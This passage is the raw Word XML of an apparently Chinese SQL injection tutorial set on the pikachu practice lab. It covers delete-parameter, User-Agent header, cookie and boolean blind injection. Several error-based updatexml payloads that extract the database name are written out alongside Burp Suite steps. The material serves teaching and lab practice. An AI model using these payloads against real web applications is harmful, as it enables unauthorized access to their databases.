        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="10" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="10" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="10" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="10" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="259"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377F48">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>' or updatexml(0,concat(0x7e,(database())),0) or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBA13A" w14:textId="77777777" w:rsidR="001E4AB4" w:rsidRDefault="00377F48"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6A231774" wp14:editId="5F47B3D3">
            <wp:extent cx="5278120" cy="2607130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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8120" cy="2607130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48650ECD" w14:textId="77777777" w:rsidR="00377F48" w:rsidRPr="009E7F7C" w:rsidRDefault="00377F48" w:rsidP="00377F48">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00391306">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D9713B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dalete注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5BB6B" w14:textId="77777777" w:rsidR="00377F48" w:rsidRDefault="00377F48" w:rsidP="00F562B1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一般应用于前后端发贴、留言、用户等相关删除</w:t>
      </w:r>
      <w:r w:rsidR="00097BDE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00097BDE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点击删除按钮时可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过Brup Suite抓包，</w:t>
      </w:r>
      <w:r w:rsidR="00097BDE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对数据包相关delete参数进行注入，注入方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923D5C1" w14:textId="77777777" w:rsidR="00AA0587" w:rsidRPr="00AA0587" w:rsidRDefault="00AA0587" w:rsidP="00AA0587">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="9" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="9" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="9" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="9"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2" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="320"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> from message where id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> updatexml(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>,concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>,(database())),</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0587">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC3DCE" w14:textId="77777777" w:rsidR="00097BDE" w:rsidRPr="00AA0587" w:rsidRDefault="00AA0587"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5CCA9B10" wp14:editId="63ABA6DA">
            <wp:extent cx="5278120" cy="1328163"/>
            <wp:effectExtent l="1905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8120" cy="1328163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6BE8DF" w14:textId="77777777" w:rsidR="00D9713B" w:rsidRPr="009E7F7C" w:rsidRDefault="00D9713B" w:rsidP="00D9713B">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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D9713B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Http Header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D16F1B" w14:textId="77777777" w:rsidR="00D9713B" w:rsidRPr="00D9713B" w:rsidRDefault="00D9713B" w:rsidP="00D9713B">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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9713B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>先在pikachu平台打开Http Header注入模块，点击提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查看登录帐号和密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9713B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">，登陆后去BurpSuite中找到登陆地GET请求，把请求发送到Repeater模块中，去除User-Agent：，然后输入' 然后运行后观察MYSQL语法报错然后发现存在SQL注入漏洞。这时候可以设置payload。在User-Agent输入payload </w:t>
      </w:r>
      <w:r w:rsidR="00D5791B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9713B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>' or updatexml(1,concat(0x7e,database ()),0) or '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A02C35" w14:textId="77777777" w:rsidR="001E4AB4" w:rsidRPr="00D9713B" w:rsidRDefault="00FD2E3F" w:rsidP="00F562B1">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4B2CE491" wp14:editId="144973AF">
            <wp:extent cx="5278120" cy="2475079"/>
            <wp:effectExtent l="19050" t="0" r="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278120" cy="2475079"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CCDF72" w14:textId="77777777" w:rsidR="00FD2E3F" w:rsidRPr="009E7F7C" w:rsidRDefault="00FD2E3F" w:rsidP="00FD2E3F">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00391306">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FD2E3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4EB5B" w14:textId="77777777" w:rsidR="00FD2E3F" w:rsidRPr="00FD2E3F" w:rsidRDefault="00FD2E3F" w:rsidP="00FD2E3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2E3F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie是网站为了识别用户身份来跟踪会话的，虽然Cookie是由后端生成的，但每次页面跳转，后端都回对前端的Cookie的信息进行验证，但如果后端获取Cookie后放在数据库中进行拼接，那么这也将是一个SQL注入点。在 ant[uname]=admin后添加一个’观察反馈的MYSQL的语法报错，发现了存在SQL注入漏洞，在设置Payload 'and updatexml (1,concat(0x7e,database()),0)#,观察报错和之前</w:t>
      </w:r>
      <w:r w:rsidR="00FB2221">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2E3F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相同</w:t>
      </w:r>
      <w:r w:rsidR="00FB2221">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE60530" w14:textId="77777777" w:rsidR="00FD2E3F" w:rsidRDefault="00FB2221"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60E7AE5B" wp14:editId="3318B239">
            <wp:extent cx="5278120" cy="2192656"/>
            <wp:effectExtent l="19050" t="0" r="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8120" cy="2192656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61B11E" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRPr="009E7F7C" w:rsidRDefault="008E1A7B" w:rsidP="008E1A7B">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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oolian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>布尔型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4ABF5" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRPr="008E1A7B" w:rsidRDefault="008E1A7B" w:rsidP="008E1A7B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="380"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在我们的注入语句被带入数据库查询但却什么都没有返回的情况我们该怎么办？例如应用程序就会返回一个“通用的”的页面，或者重定向一个通用页面（可能为网站首页）。这时，我们之前学习的SQL注入办法就无法使用了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD5AA99" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRPr="008E1A7B" w:rsidRDefault="008E1A7B" w:rsidP="008E1A7B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>盲注，即在SQL注入过程中，SQL语句执行选择后，选择的数据不能回显到前端，我们需要使用一些特殊的方法进行判断或尝试，这个过程称为盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE8C32" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRPr="008E1A7B" w:rsidRDefault="008E1A7B" w:rsidP="008E1A7B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="194" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SQL盲注分为三大类：</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>基于布尔型SQL盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>基于时间型SQL盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>基于报错型SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655211F" w14:textId="77777777" w:rsidR="008E1A7B" w:rsidRDefault="00FF0F01"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557A1464" wp14:editId="476D1872">
